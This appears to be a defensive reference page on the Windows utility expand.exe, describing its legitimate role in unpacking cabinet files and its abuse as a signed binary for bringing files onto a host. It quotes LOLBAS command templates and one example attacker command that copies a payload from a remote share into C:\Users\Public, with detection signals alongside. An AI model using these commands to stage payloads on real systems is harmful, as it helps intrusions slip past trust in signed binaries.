Process

unknown

expand.exe

expand.exe extracts files from Windows cabinet (.cab) archives and can copy files. It is used legitimately during setup and servicing. Attackers use it to copy files, including from remote shares, through a signed binary, a simple ingress and staging trick.

CategoryUtilityTagsmicrosoftcore-windowslolbin

File identity

File details

Not observed.

Signing information

Not observed.

File version0

Not observed.

File size0

Not observed.

Execution context

File paths0

Not observed.

User context0

Not observed.

Integrity level0

Not observed.

Instances0

Not observed.

Session0

Not observed.

Token privileges0

Not observed.

Ancestry

Parents0

Not observed.

Children0

Not observed.

Grandparents0

Not observed.

Grandchildren0

Not observed.

Behavior

Loaded modules0

Not observed.

Named pipes0

Not observed.

Process handles0

Not observed.

Command-line patterns0

Not observed.

LOLBAS3
  • expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}Download · Use to copies the source file to the destination file
  • expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}Copy · Copies files from A to B
  • expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.batADS · Copies files from A to B

View LOLBAS entry

Indicators

Hashes

Not observed.

Analysis

About this process

expand.exe expands compressed files from .cab archives to a destination, and it can also copy a plain file from a source to a destination. Both the source and destination can be UNC paths, so it reads and writes across the network. The genuine binary lives at C:\Windows\System32\expand.exe.

Legitimately, expand is used by Windows servicing and installers to unpack cabinet files. The source and destination on its command line are what give an instance meaning.

Security notes

expand.exe is a small ingress and staging tool (T1105). Because it copies files, including from and to UNC paths, an attacker uses expand \\host\share\payload.exe C:\Users\Public\p.exe to bring a file onto the host through a trusted, signed binary, or to stage files for the next step. A copy from a remote share, or an executable landing in a user-writable directory, is what gives it away.

Because expand has a genuine role in servicing, the source and destination are what matter. A remote source or a payload-looking destination under an unusual parent separates abuse from legitimate unpacking.

Anomaly signals4
  • Image path other than C:\Windows\System32\expand.exehigh
  • A remote (\\host\share) source or destinationhigh
  • Writing an executable or script into a user-writable pathhigh
  • Parent is an Office application, a script host, or an unfamiliar processhigh

Telemetry

OS prevalence0

Not observed.

Observation timeline

Not observed.

References

Subsearch

Hasbeen seen inof expand.exe?
Edit this page on GitHub